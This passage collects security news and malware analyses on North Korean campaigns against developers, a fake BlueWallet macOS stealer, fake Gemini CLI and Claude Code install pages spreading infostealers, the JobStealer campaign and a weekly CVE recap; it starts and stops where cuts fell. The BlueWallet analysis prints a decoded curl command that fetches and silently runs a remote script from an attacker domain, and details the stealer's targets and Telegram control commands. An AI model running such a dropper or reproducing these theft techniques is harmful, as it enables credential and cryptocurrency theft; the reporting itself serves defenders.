exfiltration from browser wallet extensions, credentials, and desktop wallet apps. The Linux and macOS infection chains lead to a custom version of the open-source Overlord framework with capabilities to enable data theft. It also prompts users to enter their system password using a fake security pop-up. The Windows attack chain, on the other hand, relies on the VBScript payload to run a CMD file, which then installs the extension. The end goal remains the same: to steal credentials and data from wallet browser extensions and applications, and exfiltrate the results to the server ("23.137.105[.]75:5173") via an HTTP POST request. "Unlike the Linux/macOS agent, the Windows pipeline does not maintain a persistent connection; it uploads the ZIP files, performs cleanup, and terminates," Proofpoint said. Further analysis has uncovered that the threat actor previously distributed a Windows Go binary of Overlord, but has since shifted to the new method, likely in an attempt to avoid detection. Proofpoint said it's tracking UNK_DeadDrop as distinct from Contagious Interview due to differences in initial access methods (LinkedIn vs. email) and the use of the Overlord framework, which is different from the custom malware families the North Korean hacking group has traditionally deployed, including BeaverTail, InvisibleFerret, and OtterCookie. "UNK_DeadDrop activity suggests North Korea-aligned operations targeting developers for financial gain are maturing and evolving," the company said. "The shift from active social engineering over social media platforms to conduct fake interviews to large campaigns of recruitment-themed phishing emails distributing links to malicious repositories could indicate an actor industrializing and scaling operations." The disclosure comes as Yeeth Security said it discovered three malicious VS Code extensions named "ByteBinTools.jupyter-powerdev-2026.6.8.vsix," ToolCraft.jupyter-powertools-3.21.0.vsix," and "OLDev.markdown-mode-devtools-2.1.0.vsix" on the official marketplace that are dressed up as seemingly harmless Jupyter Notebook productivity tools, but are, in fact, a "sophisticated, multi-stage backdoor" engineered to bypass endpoint defenses. The malware supports the following functions - A SharePoint site functioning as a command queue, victim registry, and exfiltration channel A JavaScript layer that handles all command-and-control (C2) communication via Microsoft Graph API and SharePoint to Components enabling arbitrary file read, write, and exfiltration, as well as code execution using a Windows executable and a Python script for Linux and macOS The C2 channel, besides running commands or scripts, can issue a third command type called "host_action," which facilitates file system operations like pwd, ls, cd, and cat, along with file upload and downloads. Although there exists no direct overlap with any publicly documented North Korean campaign, Yeeth Security said the developer tooling split between JavaScript and Python has its echoes in Contagious Interview, and that the malicious artifacts' Microsoft Graph API authentication mechanism shares some similarities with the Lazarus Group's Dream Job attacks detailed by S2 Grupo LAB52 in October 2025. The findings dovetail with the discovery of multiple campaigns linked to the North Korean threat actors in recent months - A follow-up to the Axios supply chain attack using three malicious npm packages ([email protected], [email protected], and [email protected]) that deliver an information stealer that exfiltrates harvested data to a different C2 infrastructure. The packages are listed as dependencies on GitHub projects disguised as cryptocurrency trading bots. "Less than 18 hours after the Axios malicious packages were removed from NPM, the first secondary payload was already live on the registry," OpenSourceMalware said. "This suggests the threat actor had prepared backup infrastructure and was ready to immediately deploy alternative delivery mechanisms." An attack campaign codenamed TaskJacker has been observed dropping malicious VS Code task files into unsuspecting GitHub users' existing repositories, spreading in a worm-like fashion. "By weaponizing VS Code's tasks.json auto-execution feature, attackers have created a scenario where simply opening a cloned repository in your IDE can compromise your system," the OpenSourceMalware team said. "No user interaction required beyond a git clone and opening the folder." Contagious Interview's use of Git hooks (".githooks/pre-commit") to fire the execution of malicious code when a target clones a "coding assessment" repository, marking a shift from hiding the malicious code within .vscode/tasks.json or package.json files. Contagious Interview's use of a compromised Packagist package ("roberts/leads") to target PHP developers with a JavaScript malware loader that reaches out to blockchain and public RPC infrastructure in order to fetch, decrypt, and execute a next-stage JavaScript payload. The adversary has also leveraged its access to compromised developer systems to tamper with commits and inject multi-stage obfuscated JavaScript code to the source code files in their repositories. The final payload is a variant of the DEV#POPPER RAT. "Void Dokkaebi's operations do not end with a single infected developer," Trend Micro said. "The compromised machine becomes a launchpad, with the threat actor weaponizing the victim's own repositories and turning their code contributions into infection vectors for downstream developers. The result is a self-sustaining propagation chain resembling a worm's behavior rather than a traditional targeted attack." Contagious Interview's migration of InvisibleFerret from readable Python scripts to Cython-compiled binaries, distributing the malware as .pyd files on Windows and .so files on macOS. "The update gives the intrusion set an additional layer of evasion while preserving InvisibleFerret's core capabilities, including backdoor access, browser credential theft, clipboard monitoring, keylogging, and cryptocurrency wallet targeting," Trend Micro said. "BeaverTail has also expanded beyond its original downloader and stealer role into a broader malware with overlapping functions, including credential harvesting and wallet trojanization." A malicious npm package named "terminal-logger-utils" has been found to target Telegram data, SSH keys, crypto wallets, cloud configurations, and environment variables. The package was published by "jpeek895," an account flagged for publishing a similar package called "terminal-logger-pack" in late April 2026. Another npm package named "js-logger-pack" has been found to deliver an ELF binary with infostealer and remote access trojan (RAT) capabilities. BlueNoroff's (aka Sapphire Sleet and UNC1069) targeting of macOS environments within high-value financial sectors to deliver infostealer malware as part of a targeted social engineering against individuals in the cryptocurrency, investment, and Web3 space. Some of these efforts also make use of fake Zoom and Microsoft Teams meeting-themed lures and ClickFix-style prompts and instructions to install supposed "missing" meeting SDKs and deliver malicious payloads. The attacks led to the deployment of updated variants of Cabbage RAT (aka CageyChameleon), PowerShell implants capable of credential and data theft, or a newly identified data-stealing macOS toolkit known as Mach-O Man. "By persuading users to manually execute AppleScript or Terminal-based commands, Sapphire Sleet shifts execution into a user-initiated context, allowing the activity to proceed outside of macOS protections such as Transparency, Consent, and Control (TCC), Gatekeeper, quarantine enforcement, and notarization checks," Microsoft said. Contagious Trader's use of over 50 malicious packages embedded across more than 100 GitHub repositories targeting developers in the cryptocurrency space to deliver three malware families: PromptMink, OtterCookie, and a new Windows clipboard stealer called ClipViper. "The malicious repositories are promoted through verified accounts on X and Reddit, use spoofed developer identities and bot-inflated star counts to appear legitimate, and are distributed across 40+ GitHub users and organizations as redundant delivery fronts," Panther said. A cluster of obfuscated malicious npm packages published by multiple throwaway accounts has been found to deliver variants of the OtterCookie infostealer by means of a postinstall hook. Another malicious npm package named "node-env-resolve" has been identified as making use of six runtime dependencies that match the OtterCookie toolkit. Contagious Interview's use of generative artificial intelligence to assist with the development of loaders responsible for launching BeaverTail and OtterCookie, and to set up front companies used for listing job openings and social engineering outreach via fake LinkedIn accounts. According to data shared by Expel, these campaigns are likely carried out by multiple teams, each comprising several members. The attacks have resulted in the theft of $12 million in cryptocurrency in the first three months of 2026. "The threat actor's campaigns exfiltrated a total of 26,584 cryptocurrency wallets from 2,726 infected developers' systems," Expel's Marcus Hutchins said. A supply chain attack campaign codenamed jsonspack has used 27 malicious npm packages to deliver a JavaScript RAT and infostealer, or drop a loader that fetches an unspecified payload. Another malicious npm package named "sleek-pretty" has been found to target developers running Polymarket trading bots to carry out system fingerprinting, SSH backdoor installation, filesystem exfiltration, and targeted theft of Polymarket CLOB API credentials. A sustained npm malware campaign spanning 108 malicious packages and 261 package versions targeted developers between March 20 and April 20, 2026, with an aim to steal credentials, Telegram Desktop sessions, and wallet keys, and establish persistent access using malware families like BeaverTail and OtterCookie. "Whilst financially motivated cybercrime is highly unappealing to almost every nation-state, since the monetary loss from the resulting sanctions would far outweigh any financial gain, this is not the case for North Korea," Expel said. "The heavy sanctions already levied against the country mean there is little more that can be done to deter them, but a lot to be gained for a nation whose economic activity is severely constrained."
thehackernews.comJun 15, 2026extracted
Fake BlueWallet steals passwords, accounts, and crypto from Macs
A fake website impersonating BlueWallet (a real Bitcoin wallet) is targeting Mac users with a simple but effective attack. BlueWallet itself has not been compromised. Instead, cybercriminals have stolen the name and branding of the legitimate Bitcoin wallet to make a malicious download appear trustworthy. If you went looking for a cryptocurrency wallet and landed on one of these fake BlueWallet download pages, the site tried to trick you into opening a downloaded file in a built-in macOS tool and pressing “Run.” If you followed those instructions, the malware could steal saved passwords, browser logins, cryptocurrency wallets, documents, and other sensitive data. It also watches the clipboard for cryptocurrency wallet addresses and can replace them with attacker-controlled addresses.. That last feature is particularly dangerous. If you copy a wallet address before sending funds, the malware can silently replace it with the attacker’s address. Everything looks normal on screen, but the money goes somewhere else. Should you worry? Only if you downloaded and ran the file. Simply visiting the page and closing it does nothing on its own. The attack depends entirely on the user opening the script and pressing play. If you did run it, treat the machine as compromised and follow the steps below. What to do if you may have run it If you opened the file and pressed play, assume your device was compromised and work through these steps: Disconnect the machine from the network to cut the control channel Run a full scan of the device, and make sure you’re using up-to-date security software with web protection enabled From a different, trusted device, change passwords for any accounts used on the Mac, starting with email and cryptocurrency exchanges Move any cryptocurrency to a new wallet created on a clean device Treat existing seed phrases and keys as exposed Before sending crypto in future, verify the full destination address character by character Check for and remove unfamiliar files in ~/Library/LaunchAgents Look for a hidden .sysupd.sh file in/tmp Rotate cloud and SSH credentials if .ssh ,.aws , or.gnupg files were present on the machine When in doubt, back up your data and reinstall macOS from a known-good source rather than trying to clean in place Picked up something you shouldn’t have? Social engineering tricks The most interesting part of this campaign isn’t technical. The attackers didn’t break into the Mac or bypass Apple’s security protections. They persuaded victims to run the malware themselves. The fake website walks users through the process with a convincing download page, simple instructions, and even a keyboard shortcut. The attack succeeds because the victim trusts what they are seeing. As operating systems get better at blocking malicious software, attackers are increasingly investing in social engineering. Instead of finding ways around security controls, they convince people to click through them. That’s why one habit is becoming increasingly important: Be suspicious of any download that arrives with instructions to open it in a scripting tool, developer utility, or Terminal window and press “Run.” In this campaign, a single press of ⌘R was enough to turn a Mac into a password stealer, cryptocurrency wallet thief, clipboard hijacker, and remote access tool. Technical analysis Stage one: The AppleScript downloader The page lives at update-bluewallet[.]com, a domain name close enough to the real wallet (bluewallet.io) to pass a quick glance. The first thing the page does is not wait for consent. Its script calls a download routine on a two-second timer the moment the page loads, and again if the visitor clicks either of two buttons. The file that lands in the Downloads folder is named BlueWallet Installer.applescript, an extension most people have never seen and have no instinct to distrust. Then the page does something quietly clever. After a short delay, it rewrites its own status text to read like setup instructions: open the installer, then press the play button or ⌘R. It even draws a small blue play triangle in the text so the wording matches the real Script Editor interface the victim is about to see. The page walks the victim through the exact motions needed to run the file. On modern macOS, an unsigned application downloaded from the web gets quarantined and checked before it can run. A plain script opened in Script Editor and executed by the user sidesteps that flow. The person is manually instructing a trusted Apple tool to run code, so there is no notarization gate to fail. This is why the attacker chose an AppleScript instead of a packaged app: it moves the risky action out of the operating system’s hands and into the victim’s. The AppleScript itself is remarkably short. Stripped of its decorative comments, including a fake version number and a line claiming to be a “Brew Install Upgrade,” it runs a single base64-encoded shell command and then tells Script Editor to quit without saving, removing the evidence from view. Decoded, that command does this: curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 & It fetches a second script from a remote host, saves it to a hidden file in the temp directory, makes it executable, and runs it in the background with all output suppressed. The victim sees nothing. The filename .sysupd.sh is dressed up to look like a system update. This is a textbook staged dropper: stage one is tiny and disposable, and its only job is to fetch the real payload. Stage two: Payload analysis The first lines establish how the malware intends to operate. It sets umask 077 so everything it creates is readable only by the compromised user, then builds a hidden, randomly named working directory under /tmp seeded from /dev/urandom. Its configuration is obfuscated, but weakly. A small function named _xd walks a hex string two characters at a time and XORs each byte against a hardcoded repeating key: swckR9JCD2Uu. That function decodes the script’s Telegram bot token, chat identifier, secondary command token, and staging URL at runtime. It is enough to defeat tools that only search for plaintext strings, but not much more. Because the key and algorithm are both sitting in the file, every encoded value is fully recoverable. One detail stands out: The decoded Telegram chat value and decoded command-and-control chat value are identical. The attacker is using a single Telegram channel as both the exfiltration drop and the control channel. It is cheap, scalable, encrypted, and blends into ordinary HTTPS traffic. Not everything is obfuscated. The clipboard-hijacking addresses are sitting in the file in plain text: a Bitcoin address, an Ethereum address, and a Solana address. These are the addresses the implant swaps in when it catches you copying a wallet address. Because they are public on their respective blockchains, they are also among the most useful artifacts in the whole sample. What the malware steals The second stage’s collection routines are sweeping. They pull from six broad categories. 1. Web browsers The script extracts history, cookies, login data, and bookmarks from a wide range of browsers, including: Chromium-based browsers: Google Chrome Stable, Beta, Canary, and Dev; Brave; Microsoft Edge; Vivaldi; Opera; Opera GX; Arc; Chromium; Coccoc; and Yandex Firefox-based browsers: Firefox, Waterfox, Pale Moon, Zen, and LibreWolf macOS native browser data: Safari cookies, history, and form values 2. Cryptocurrency wallets This appears to be the script’s primary focus. It targets desktop wallet applications including Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop, and Tonkeeper. It also targets browser-extension wallets across several ecosystems: Bitcoin: Xverse, Leather, UniSat, Alby, and Wizz Solana: Phantom, Solflare, Backpack, Nightly, MagicEden, Sollet, and Slope EVM wallets: MetaMask, Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin, and XDEFI Cosmos: Keplr, Station, and Cosmostation Other ecosystems: Yoroi, Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos, and Temple 3. Password managers and security tools The malware targets local storage and settings for several password managers, including LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt, and Buttercup. It also looks for data associated with 2FA and authenticator tools, including Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS, and FreeOTP. 4. Communication and social apps The script attempts to copy session data and local storage for Telegram Desktop and Discord, including Discord Canary and Discord PTB. 5. Developer and cloud tools It looks for credentials and configuration files in the user’s home directory, including: AWS CLI configurations in .aws SSH keys in .ssh GnuPG keys in .gnupg Kubernetes configs in .kube Shell and Git files including .zshrc ,.zsh_history ,.bash_history , and.gitconfig 6. Productivity apps and general files The script copies the local Apple Notes database, NoteStore.sqlite. It also looks for browser-extension data related to shopping and productivity tools, including Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist, and Google Keep. Finally, it scans Desktop, Documents, and Downloads for files with extensions including .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, and .env, under a size cap. What it does with the stolen data The malware tries to capture the user’s account password directly. An osascript dialog titled “System Preferences” asks the user to re-enter their password “to continue.” The script validates each attempt against dscl . authonly before saving it, so it only stops once it has a working credential. For exfiltration, it archives the staged data with macOS’s own ditto, likely because it is always present, unlike zip. To stay under Telegram’s 50 MB upload limit, it breaks larger archives into 49 MB chunks with split before sending each part. It establishes persistence by writing a LaunchAgent plist into the user’s ~/Library/LaunchAgents, backed by a hidden support directory, and loading it with launchctl so the implant runs again at every login. The clipboard hijack is a live background loop. A clip_watch function continuously inspects the clipboard, matches Bitcoin, Ethereum, and Solana address formats by regex, reports the original address to the command-and-control channel, and overwrites the clipboard with the attacker’s address via pbcopy. That means the substitution happens silently between copy and paste. Finally, the malware can be controlled interactively. A c2_loop polls the Telegram bot for commands and supports a full operator toolkit: /info for system details /exec for arbitrary shell commands /clipboard to read current clipboard contents /download to pull specific files /exfil to rerun the theft module /selfdestruct to wipe traces This makes the Telegram channel a real-time remote-control link, not just a one-way drop. Living off the land, and off Telegram The pattern here is familiar and getting more common: lean on tools that are already trusted. The delivery abuses Apple’s own Script Editor. The configuration hides behind a trivial XOR rather than packed binaries. The command channel rides Telegram’s Bot API, which can pass through egress filters that would flag an unknown server. None of these pieces is novel on its own. The effectiveness comes from stacking legitimate-looking components so no single step trips an alarm. Detection opportunities The lessons here are less about the lure and more about the technique itself. Script Editor executing a one-line base64 do shell script that immediately quits is a strong behavioral signal, and a far better detection target than the disposable stage-one file. So is a hidden /tmp/.sysupd.sh downloaded by curl and launched in the background. Browsers and download surfaces could treat .applescript files arriving from the web with the same suspicion as executables. And Telegram remains an under-addressed command-and-control medium that bot-token abuse reporting could disrupt at the source. Indicators of Compromise File hashes (SHA-256) 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript ) Network indicators update-bluewallet[.]com projects2026box[.]com Clipboard-hijack addresses BTC: bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e ETH: 0x2B871703122064e45d77146a6D5203da3bD192FA SOL: 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v From reporting threats to removing them. Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
malwarebytes.comJun 1, 2026extracted
Fake Gemini and Claude Code Sites Spread Infostealers Through SEO Poisoning
Security researchers at EclecticIQ have uncovered a new malicious campaign in which cyber threat actors created fake sites posing as Google Gemini’s coding tool and Anthropic’s Claude Code to deliver information stealing malware. The initial warning came from an independent security research, known as @g0njxa on social media. On April 21, they flagged on X an impersonation campaign exploiting Gemini command line interface (CLI), a feature that lets developers interact with Gemini AI models directly from their terminal. EclecticIQ researchers investigated the campaign based on these findings. They found that the threat actor started deploying malicious domains in early March 2026. They also assessed that the campaign is likely geographically tailored to target users in the US and the UK, as evidenced by the selection of .co.uk, .us.com and .us.org top-level domains in some of the attacker-controlled domains. Infostealer Capabilities To ensure these domains would be attractive to their targets, SEO poisoning methods were used to surface fake domains above legitimate results, directing victims to attacker-controlled infrastructure that mimics genuine AI agent installation pages. The domains lead to an infostealer that targets Windows endpoints and executes entirely in memory through PowerShell, harvesting credentials and sensitive data from a wide range of applications before exfiltrating the results in encrypted form to a command-and-control (C2) server. “The stealer's collection scope reveals a deliberate focus on enterprise users and developer workstations,” the EclecticIQ researchers noted in a May 21 report. It targets both Chromium-family browsers, like Chrome, Edge and Brave, as well as Firefox, to extract login credentials, session cookies, autofill data and form history. Beyond browsers, the script directly targets collaboration and communication platforms that are standard in corporate environments. These include: Slack: local state key extraction and network cookies Microsoft Teams: EBWebView cache cookies under LocalAppData, with DPAPI-protected local state decryption Discord: local storage LevelDB files and local state Mattermost: session cookies and local state Zoom: DPAPI-protected win_osencrypt_key extracted from Zoom.us.ini Telegram Desktop: tdata session directory LiveChat, Notion, Zoho Mail Desktop: session cookies and partitioned storage data EclicticIQ noted that a session cookie or a local state key from any of these platforms grants authenticated access to the victim's workspace, including internal channels, shared files, client communications and connected integrations. The infostealers also collects data from remote access tools, OpenVPN configuration files, cryptocurrency wallets (e.g. Brave Wallet preferences and Spectre wallet data), cloud storage (e.g. Proton Drive, iCloud Drive, Google Drive, MEGA, OneDrive) and user files and system metadata. Finally, it allows the attacker to perform arbitrary remote code execution tasks on the victim’s device. Financially motivated cybercriminals typically leverage such capabilities to transition into hands-on-keyboard intrusions against selected victims and execute interactive code within the compromised environment. Gemini CLI Attack Chain Targeted victims who think they are visiting Gemini CLI are instead directed to fake installation page geminicli[.]co[.]com, which displays what appears to be a legitimate installation instruction. The page prompts the user to copy and paste a PowerShell command into their terminal. When executed, the command reaches out to gemini-setup[.]com to download the infostealer downloader payload. Once downloading is finished, the infostealer establishes a connection to C2 server hosted at events[.]msft23[.]com, an infrastructure used to receive exfiltrated data from compromised hosts. Claude Code Attack Chain On March 30, EclicticIQ observed that someone registered two additional domains impersonating Claude Code, claudecode[.]co[.]com and claude-setup[.]com. In a similar pattern as with the Gemini CLI impersonation, the malicious domain claudecode[.]co[.]com hosts a cloned installation page visually consistent with Anthropic's official documentation and presents the user with a PowerShell command to ‘install’ the tool, while claude-setup[.]com hosts the final payload that was downloaded. After the execution, the infostealer malware sends exfiltrated data to events[.]ms709[.]com, which serves as the C2 server for the Claude Code impersonation campaign. The similarities between both attack chains strongly suggest a single threat actor is behind both campaigns. Image credits: Stock all / aileenchik / Shutterstock.com
infosecurity-magazine.comMay 22, 2026extracted
JobStealer colpisce macOS e Windows e ruba dati personali con falsi colloqui di lavoro online
I ricercatori di Dr.Web hanno analizzato una nuova campagna malware che sfrutta falsi processi di selezione del personale per distribuire il trojan stealer JobStealer. L’operazione prende di mira sia utenti macOS sia Windows e si distingue per un approccio particolarmente credibile basato su piattaforme di videoconferenza fraudolente e siti web costruiti per imitare servizi professionali utilizzati nei colloqui da remoto. Secondo quanto riportato dai ricercatori, gli attaccanti contattano le vittime fingendosi recruiter o rappresentanti aziendali. Dopo un primo contatto, spesso via e-mail o piattaforme professionali, invitano il candidato a partecipare a un meeting online tramite servizi apparentemente legittimi come MeetLab, Carolla o altre piattaforme create appositamente per la campagna. In alcuni casi vengono persino riprodotti elementi grafici di strumenti noti come Cisco Webex, aumentando la credibilità dell’inganno. “Per convincere gli utenti che queste piattaforme siano perfettamente funzionanti, i truffatori creano canali Telegram e account sui social media corrispondenti, ad esempio su X.”, si legge nel rapporto. Fonte: Dr. Web. Indice degli argomenti Il meccanismo di infezione su macOS La componente più interessante della campagna riguarda le tecniche utilizzate contro sistemi macOS. Gli operatori di JobStealer sfruttano infatti il fattore umano inducendo l’utente a eseguire manualmente comandi nel Terminale. In pratica, la vittima viene convinta a copiare e incollare uno script bash con il pretesto di installare il software necessario per la videoconferenza oppure in alternativa viene distribuito un file DMG apparentemente innocuo che contiene istruzioni fraudolente per avviare le componenti malevoli Fonte: Dr. Web. Nel secondo caso, l’immagine .DMG offerta per il download contiene già i file malevoli e una volta montata, mostra le istruzioni su come installare l’applicazione. “Queste istruzioni indicano all’utente di aprire il terminale e trascinare lo script fornito nella finestra. In realtà, invece di installare l’applicazione per le videoconferenze, lo script avvierà il file trojan”, spiegano i ricercatori di Dr. Web, evidenziando che le versioni più recenti del malware includono tecniche di offuscamento più avanzate rispetto alle prime varianti osservate in circolazione. Il trojan è, inoltre, compatibile con architetture di processori x64 e ARM64, dimostrando un livello di sviluppo ormai maturo. In tutti i casi una volta eseguito lo script, il malware identificato come Mac.PWS.JobStealer.1 avvia la raccolta di informazioni sensibili presenti sul dispositivo. Raccolta di credenziali e dati sensibili Dopo l’esecuzione, JobStealer mostra una falsa richiesta di autenticazione di sistema per ottenere la password dell’utente macOS. Questo passaggio consente agli attaccanti di aumentare i privilegi e accedere a un numero maggiore di informazioni. Il malware si concentra principalmente sul furto di credenziali archiviate nei browser Chromium-based (Chrome, Opera, Brave, OperaGX, Vivaldi, Edge, Arc e CocCoc). Vengono raccolti cookie di sessione, password salvate e informazioni di pagamento memorizzate localmente. Parallelamente il trojan ricerca estensioni wallet legate al mondo delle criptovalute, prendendo di mira circa trecento plugin differenti. L’analisi mostra, inoltre, il tentativo di acquisire dati provenienti da Telegram Desktop, dall’applicazione Notes di macOS e da software wallet come Ledger Live e Trezor Suite. Tutte le informazioni raccolte vengono archiviate in file compressi ZIP ed esfiltrate verso i server di comando e controllo utilizzati dagli operatori della campagna. Una minaccia multipiattaforma Oltre alla componente macOS, Dr.Web conferma l’esistenza di una versione Windows del malware con funzionalità analoghe. Alcuni dei portali fraudolenti analizzati mostrano anche pulsanti dedicati a Linux, Android e iOS, segnale che il gruppo criminale potrebbe pianificare un’espansione futura verso ulteriori piattaforme. Fonte: Dr. Web. I rischi per aziende e professionisti Questa operazione conferma come i processi di recruiting siano diventati un vettore privilegiato per le campagne di social engineering. L’aumento del lavoro remoto e dei colloqui online rende infatti più semplice per gli attaccanti costruire scenari realistici e convincere le vittime a eseguire software non verificato. Il rischio è particolarmente elevato per professionisti IT, sviluppatori e personale aziendale che utilizzano frequentemente strumenti di videoconferenza e gestiscono credenziali sensibili sui propri dispositivi. Per ridurre l’esposizione è fondamentale impedire l’esecuzione di script copiati manualmente nel Terminale, limitare il salvataggio di password nei browser e adottare sistemi EDR capaci di rilevare tentativi di furto credenziali e anomalie nel trasferimento dati. Anche la formazione del personale resta un elemento centrale. I dipendenti devono essere addestrati a verificare sempre l’autenticità delle piattaforme utilizzate durante colloqui e meeting online, soprattutto quando viene richiesto di scaricare software o eseguire comandi manuali.
cybersecurity360.itMay 19, 2026extracted
⚡ Weekly Recap: AI-Powered Phishing, Android Spying Tool, Linux Exploit, GitHub RCE & More
This week, the shadows moved faster than the patches. While most teams were still triaging last month’s alerts, attackers had already turned control panels into kill switches, kernels into open doors, and open-source pipelines into silent delivery systems. The game has shifted from breach to occupation. They’re living inside SaaS sessions, pushing code with trusted commits, and scaling operations like legitimate businesses — except their product is chaos. And the underground is getting uncomfortably professional. Here’s the full weekly cybersecurity recap: ⚡ Threat of the Week cPanel Flaw Comes Under Attack—A critical flaw in cPanel and WebHost Manager (WHM) has come under active exploitation in the wild. The vulnerability, tracked as CVE-2026-41940, could result in an authentication bypass and allow remote attackers to gain elevated control of the control panel. In some cases, the attacks have led to a complete wipe of entire websites and backups. Other attacks have deployed Mirai botnet variants and a ransomware strain called Sorry. Is Your Security Program Built on Compliance Theater or Measurable Maturity? If you can't measure your program's maturity, you can't improve it or defend its budget. The SANS Security Awareness & Culture Maturity Model™️ maps 5 stages of security culture development with concrete indicators, behavioral targets, and alignment to business risk priorities. Download Now — Free ➝ 🔔 Top News Cybercrime Groups Use Vishing for Data Theft and Extortion—Two cybercrime groups tracked as Cordial Spider and Snarky Spider are carrying out "rapid, high-impact attacks" operating almost within the confines of SaaS environments, while leaving minimal traces of their actions. The groups employ voice calls, text messages, and emails, directing targeted employees to phishing pages masquerading as their employer's legitimate single sign-on (SSO) page to capture credentials and provide attackers an entry point into systems, which they exploit for deeper access to victims' SaaS environments. The attacks also use the initial access hooks to remove and set up multi-factor authentication devices under their control and delete emails that would otherwise alert organizations of potential malicious activity. According to CrowdStrike, "These actors use vishing to bypass MFA and move laterally across entire SaaS ecosystems with a single authenticated session, masking their tracks through residential proxy networks to blend in as legitimate home user traffic. This is part of a larger trend of English-speaking ransomware crews that share similar playbooks but are branching off into their own distinct groups." Copy Fail Linux Flaw Exploited—The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2026-31431, a vulnerability impacting various Linux distributions, to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation in the wild. It's described as a logic bug in the Linux kernel's authentication cryptographic template that allows an attacker to reliably trigger privilege escalation trivially by means of a 732-byte Python-based exploit. According to Theori and Xint, CVE-2026-31431 was the result of a series of unremarkable updates to the Linux kernel over the years, particularly one update from 2017 that was meant to speed up data encryption. As a result, all major Linux distributions from 2017 are impacted. What complicates matters is that Copy Fail works 100% of the time, unlike most local privilege escalation (LPE) bugs that tend to be probabilistic in nature. More worryingly, it leaves no traces on disk as exploitation occurs in memory and enables container escape from any pod in a Kubernetes cluster. TeamPCP's Supply Chain Attack Spree Continues—TeamPCP's extensive supply chain campaign continued last week, as the cybercriminal group compromised several packages across the npm, PyPI, and Packagist ecosystems in a "Mini Shai-Hulud" attack. TeamPCP has in recent months compromised the packages of several open source software projects, including Trivy, a security scanner maintained by Aqua Security, and KICS, a Checkmarx-developed tool for static code analysis. Amit Genkin, threat researcher at Upwind, said the latest string of attacks represents a shift, where they are not only more frequent but harder to detect because they weaponize legitimate CI/CD pipelines to push out poisoned versions under real identities, allowing the activity to blend in with normal development workflows. "Campaigns like Shai-Hulud take that further by using each compromised pipeline to spread to the next, turning credential theft into a scaling problem across environments," Genkin said. "For teams, the immediate priority is to check for the affected version and rotate any credentials tied to pipelines that may have run it, especially GitHub and cloud tokens. Longer term, this is a signal to reduce how broadly pipeline credentials are scoped and to add visibility into what's actually happening during installs and builds – because if you're relying on traditional scanning or known indicators, this type of activity is easy to miss." New Python Backdoor Enables Comprehensive Data Theft—A newly identified stealthy Python-based backdoor framework dubbed DEEP#DOOR provides attackers with persistent remote command execution and surveillance capabilities on Windows computers. Once active, the backdoor enables shell command execution, file manipulation, system and network reconnaissance, and surveillance operations such as keylogging, clipboard monitoring, screenshot capture, microphone and webcam access, and credentials and SSH key harvesting. Additionally, the malware can shift from data gathering to disruption and system manipulation, as it can overwrite the Master Boot Record, force system crashes, exhaust system resources by spawning numerous processes, and disable Microsoft Defender services. GitHub Flaw Leads to Remote Code Execution—Cybersecurity researchers from Wiz disclosed details of a critical security vulnerability impacting GitHub.com and GitHub Enterprise Server (CVE-2026-3854, CVSS score: 8.7) that could allow an authenticated user to obtain remote code execution with a single "git push" command. The vulnerability was severe enough that Microsoft rolled out a patch within six days of responsible disclosure. On GitHub.com, it allowed remote code execution on shared storage nodes, and on GitHub Enterprise Server, it granted full server compromise, enabling unauthorized access to all hosted repositories and internal secrets. "Exploitation could expose the codebases of nearly all of the world's biggest enterprises, making this one of the most severe SaaS vulnerabilities ever found," a Wiz spokesperson told The Hacker News. VECT 2.0 Ransomware's Flawed Encryption Makes Data Recovery Impossible—VECT 2.0 ransomware has been found to wipe large files instead of merely encrypting them, making recovery impossible, even for the attackers. VECT 2.0 is a ransomware-as-a-service (RaaS) program that first appeared in December 2025. The group quickly grabbed headlines after it announced on BreachForums that it was partnering with TeamPCP, the threat group behind several supply chain attacks, such as Trivy, Checkmarx KICS, LiteLLM, and Telnyx, in March and April 2026. VECT also announced a partnership with BreachForums itself, promising that every registered forum user will become an affiliate and be granted use of the ransomware, negotiation platform, and leak site for operations. Beazley Security, in an analysis of the ransomware, said the VECT 2.0 RaaS panel covers the "full operational lifecycle an affiliate needs from payload generation through to payout." 🔥 Trending CVEs Bugs drop weekly, and the gap between a patch and an exploit is shrinking fast. These are the heavy hitters for the week: high-severity, widely used, or already being poked at in the wild. Check the list, patch what you have, and hit the ones marked urgent first — CVE-2026-41940 (cPanel and WebHost Manager), CVE-2026-31431 aka Copy Fail (Linux Kernel), CVE-2026-42208 (LiteLLM), CVE-2026-3854 (GitHub.com and GitHub Enterprise Server), CVE-2026-32202 (Microsoft Windows Shell), CVE-2026-26268 (Cursor), CVE-2026-35414 (OpenSSH), CVE-2026-6770 (Mozilla Firefox and Tor Browser), CVE-2026-42167 (ProFTPD), CVE-2026-24908, CVE-2026-23627, CVE-2026-24487 (OpenEMR), CVE-2026-6807 (GRASSMARLIN), CVE-2026-7363, CVE-2026-7361, CVE-2026-7344, CVE-2026-7343 (Google Chrome), CVE-2026-7322, CVE-2026-7323, CVE-2026-7324 (Mozilla Firefox), CVE-2026-6100 (CPython), CVE-2026-0204 (SonicWall), CVE-2026-35414 (OpenSSH), CVE-2026-42511 (FreeBSD), CVE-2026-40684, CVE-2026-40685, CVE-2026-40686, CVE-2026-40687 (Exim), 